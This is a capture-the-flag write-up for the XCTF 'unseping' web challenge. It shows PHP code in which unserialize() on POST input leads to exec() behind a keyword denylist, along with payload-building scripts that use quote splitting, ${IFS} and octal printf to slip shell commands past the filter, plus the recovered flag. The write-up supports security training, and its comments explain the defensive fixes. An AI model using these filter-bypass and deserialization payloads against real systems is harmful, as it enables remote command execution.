攻防世界37-unseping-CTFWeb
   | <?php highlight_file(__FILE__);
  class ease{
      // Both properties are private; serialize() emits them with the class-name
      // mangling ("\0ease\0method", "\0ease\0args") and unserialize() restores
      // them directly, without going through __construct.
      private $method;
      private $args;

      function __construct($method, $args) {
          $this->method = $method;
          $this->args = $args;
      }

      // Runs at teardown, which includes the moment an unserialized instance is
      // discarded. The only accepted method name is "ping", checked with a
      // non-strict in_array() (no third argument); $this->args is forwarded
      // unchanged as the argument list, so the filtering in __wakeup() is the
      // only thing that ever looks at it.
      function __destruct(){
          if (in_array($this->method, array("ping"))) {
              call_user_func_array(array($this, $this->method), $this->args);
          }
      }

      // Sink: $ip is handed to exec() as the complete command line; nothing here
      // constrains it to an address, so whatever reaches this method is run by
      // the shell and its output is dumped back. The mitigation is structural:
      // never build a shell command from this value (fixed binary plus an
      // argument validated with filter_var() and escapeshellarg()).
      function ping($ip){
          exec($ip, $result);
          var_dump($result);
      }

      // Denylist filter. With no match the string is returned untouched; on a
      // match it prints "don't hack" and falls off the end, i.e. returns null,
      // so the argument is replaced rather than the request being refused.
      // A substring denylist on shell input is not a security boundary — it
      // does not model quoting, variable expansion or escapes — which is
      // exactly why the rest of this write-up exists. Prefer an allowlist of
      // expected values, or no shell at all.
      function waf($str){
          if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {
              return $str;
          } else {
              echo "don't hack";
          }
      }

      // Called by unserialize(): every element of args is passed through waf().
      // __destruct() does not re-check, so this is the single gate.
      function __wakeup(){
          foreach($this->args as $k => $v) {
              $this->args[$k] = $this->waf($v);
          }
      }
  }
  // Entry point: the POST field is attacker-controlled, base64-decoded and fed
  // straight to unserialize(), with both statements under @ so malformed input
  // fails silently (nothing is logged, which also hurts detection). The result
  // is not kept, so the restored ease object is destroyed immediately and its
  // __destruct() fires. Untrusted bytes should never reach unserialize(); a
  // data-only format such as json_decode() removes the magic-method gadget.
  $ctf=@$_POST['ctf'];
  @unserialize(base64_decode($ctf)); ?>
 
if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array))做了过滤
且 if (in_array($this->method, array("ping"))) 要求 method 必须是 ping
这是一个反序列化问题
随便试一试,得到输出
<?php
// Local stand-in for the target's class: same class name and the same two
// private property names, so the serialized form carries exactly the fields
// the target's unserialize() will restore into its own ease class. No
// __wakeup/__destruct here — those run on the receiving side.
class ease{
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
}
// "ping" is the only method name the target's __destruct() accepts; the
// argument is the write-up's first probe. Output is base64-encoded because the
// target base64_decode()s the POST field before unserialize().
$o=new ease("ping",array("ifconfig"));
$s = serialize($o);
echo base64_encode($s);
?>
 

ls被过滤了,有几种绕过方法
- 单引号,有效
 
- 双引号,有效
 
- ${IFS},${Z}有效
 
- l\s也行
 
空格被过滤了
<?php
// Same stand-in class as above (matching name and private property names).
class ease{
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
}
// The argument is the write-up's payload; this script only serializes and
// base64-encodes it. Defensive takeaway: none of the server's denylisted
// substrings occurs literally in this string, which is the expected failure
// mode of substring blocking applied to shell input.
$o=new ease("ping",array('l""s${IFS}f""lag_1s_here'));
$s = serialize($o);
echo base64_encode($s);
?>
 

/ 也被过滤了(正则中写作 \/)
使用8进制编码"/","/"的八进制编码为\57,使用$(printf${IFS}"\57")内联执行,把"/"输出到字符串中
<?php
// Same stand-in class as above (matching name and private property names).
class ease{
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
}
// The argument is a PHP single-quoted string, so the "\57" inside it is not
// interpreted by PHP; it reaches the remote shell as-is and is expanded there.
// This script only serializes and base64-encodes the value.
$o = new ease('ping', array('more${IFS}fl""ag_1s_here$(printf${IFS}"\57")f\lag_831b69012c67b35f.p\hp'));

$s = serialize($o);
echo base64_encode($s);
?>
 
得cyberpeace{305550cf468dbcfe0d6f5f0356c42ab4}

然后手动加斜杠也行
<?php
// Same stand-in class as above (matching name and private property names).
class ease{
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
}
// Variant of the previous payload with the whole command given as octal
// escapes. Because the PHP string is single-quoted, the backslash sequences
// are passed through unchanged and only printf on the remote side decodes
// them. This script only serializes and base64-encodes the value.
$o=new ease("ping",array('$(printf${IFS}"\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160")'));
$s = serialize($o);
echo base64_encode($s);
?>